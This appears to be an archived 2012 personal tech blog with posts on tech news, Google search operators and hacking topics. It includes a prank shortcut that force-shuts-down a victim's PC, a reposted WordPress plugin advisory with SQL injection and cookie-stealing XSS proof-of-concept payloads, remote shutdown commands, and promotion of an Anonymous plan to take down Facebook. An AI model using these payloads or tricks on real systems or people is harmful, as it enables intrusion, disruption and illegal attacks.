Tuesday, 31 January 2012

Check out who is your Most Valuable Follower

There is an MvfApp that computes  all your followers and shows who is your mvf , its fun :)
Try it here MVF

Mine is as below :

Follow Me here
Follow Ajkumar here

THANK ME LATER.......

Monday, 30 January 2012

How to make a fake 'virus'

Right click on your desktop , select new , then shortcut . Then type in (win shutdown -s -f -t 60 -c "tricks")
well , you can type anything at the end but i chose "tricks" for this example .It will appear as ;


Click next , type in the name of the shortcut
Go to your desktop and click on the file you created , you can also change the icon if you like .
It  will open a dialog box and the user will be logged off in 60 seconds .Enjoy :)

THANK ME LATER.....

Friday, 27 January 2012

Kenyanstar.co.ke / ingwefans.com hacked !!!!!!!!!!!!!!!!!!

The below is a screenshot on the website's homepage : www.kenyanstar.co.ke and ingwefans.com


A hackers group #MAGRU  #BLUEHACKERTR claim to have done the damage .No press release yet


THANK ME LATER.....

How to Get Around Twitter Restrictions

How to Get Around Twitter Restrictions:

'via Blog this'

Thursday, 26 January 2012

BASIC SEARCH TECHNIQUES


Since the Google web interface is so easy to use, I won't describe the basic functionality of the http://www.google.com web page. Instead, I'll focus on the various operators available:
  • Use the plus sign (+) to force a search for an overly common word. Use the minus sign (-) to exclude a term from a search. No space follows these signs.
  • To search for a phrase, supply the phrase surrounded by double quotes (" ").
  • A period (.) serves as a single-character wildcard.
  • An asterisk (*) represents any word—not the completion of a word, as is traditionally used.
Google advanced operators help refine searches. Advanced operators use a syntax such as the following:
operator:search_term
Notice that there's no space between the operator, the colon, and the search term.
  • The site: operator instructs Google to restrict a search to a specific web site or domain. The web site to search must be supplied after the colon.
  • The filetype: operator instructs Google to search only within the text of a particular type of file. The file type to search must be supplied after the colon. Don't include a period before the file extension.
  • The link: operator instructs Google to search within hyperlinks for a search term.
  • The cache: operator displays the version of a web page as it appeared when Google crawled the site. The URL of the site must be supplied after the colon.
  • The intitle: operator instructs Google to search for a term within the title of a document.
  • The inurl: operator instructs Google to search only within the URL (web address) of a document. The search term must follow the colon.
THANK ME LATER.....

Monday, 23 January 2012

Anonymous bringing down Facebook on 28th JAN

This is brief from #Anonymous , hackers legion .We want to bring down facebook ,but we need your help in mind that facebook has 60,000 servers.

At exactly 12am UTC it will strike . Stay tuned  member handles on twitter to get links on how you can participate. Below is a release by one of its sources:

In the description , find all instructions on how to participate in #opglobalblackout PART2

Hashtag #opglobalblackout

THANK ME LATER........

Thursday, 19 January 2012

The best response to SOPA and PIPA so far . lqtm

And this is how theoatmeal.com protested SOPA and  PIPA . Genious . lol

Theoatmeal.com

Monday, 16 January 2012

Samsung's flexible and transparent tablet .WOW!!!!!



Above: Samsung displaying  their concept of transparent flexible tablet at #CES2012

Below : a video showing the features of the flexible AMOLED

One word : AMAZING

Thank me later.....

Tech investors in Africa

Tekedia » These Are Investors Putting Money In Tech Companies In Africa – Contact Them!:

'via Blog this' via @techmtaa

Monday, 9 January 2012

Justin Timberlake appearance at #CES2012



BRINGING MYSPACE TV BACK!!!!!!!

THANK ME LATER......

Wordpress pay with tweet cross site scripting /sql injection


WordPress Pay With Tweet plugin versions 1.1 and below suffer from cross site scripting and remote SQL injection vulnerabilities.

# Exploit Title: Wordpress Pay With Tweet plugin <= 1.1 Multiple Vulnerabilities
# Date: 01/06/2012
# Author: Gianluca Brindisi (gATbrindi.si @gbrindisi http://brindi.si/g/)
# Software Link: http://downloads.wordpress.org/plugin/pay-with-tweet.1.1.zip
# Version: 1.1
 
1)  Blind SQL Injection in shortcode:
    Short code parameter 'id' is prone to blind sqli,
    you need to be able to write a post/page to exploit this:
 
    [paywithtweet id="1' AND 1=2"]
    [paywithtweet id="1' AND 1=1"]
 
2)  Multiple XSS in pay.php
    http://target.com/wp-content/plugins/pay-with-tweet.php/pay.php   
     
    After connecting to twitter:
        ?link=&22></input>[XSS]
    After submitting the tweet:
        ?title=[XSS]&dl=[REDIRECT-TO-URL]%27)">[XSS]
 
    The final download link will be replaced with [REDIRECT-TO-URL]
 
    POC: pay.php?link=%22></input><script>alert(document.cookie)</script>&title=<script>alert(document.cookie)</script>&dl=http://brindi.si%27"><script>alert(document.cookie)</script>



Tuesday, 3 January 2012

Latest hacking news!!!!

New York Times Hacked? - Slashdot:

'via Blog this'

Best phones: Motorola Droid Razr - CNET's best and worst phones of 2011 - CNET Reviews

Check where your smartphone ranks . Ha!
Best phones: Motorola Droid Razr - CNET's best and worst phones of 2011 - CNET Reviews:

'via Blog this'

How to remotely log off , restart , shut down


This article will describe how we can remotely restart, shutdown, log off or even abort a system shutdown in our Local/Network machines using Remote Shutdown Tool (shutdown.exe).
We can use the Remote Shutdown Tool with GUI or from the command prompt but we need to have administrative privileges on those machines.
We can start the GUI of Remote Shutdown Tool by executing:
shutdown.exe /i
Remote Shutdown GUI
Adding a network computer
If we need to use the command line tool here are the options:
Note: We can use the – switch in case / switch does not work or vice versa
Usage examples:
Restart a network machine and force any running applications to close
shutdown /m \\computername /r /f
Abort a previous shutdown command
shutdown /m \\computername /a
Shutdown a network machine and force any running applications to close
shutdown /m \\computername /s /f
Logoff a machine and force any running applications to close (This cannot be used with /m to specify the target machine)
shutdown computername /l /f
Hibernate a local machine and force any running applications to close
shutdown /m \\computername /h /f
Note: By default the time-out period in previous examples is set to 30 seconds.
Restart a network machine and force any running applications to close giving a reason and set the time-out period to 1 minute (120 sec)
shutdown /m \\computername /r /f /c “Computers will restart in 1 minute, please save any work. System Administrator” /t: 120
Schedule a restart of a machine:
at 23:00 /every:M,T,W,Th,F shutdown /r /m \\computername

TRY IT .. HAVE FUN

THANK ME LATER......

Information is free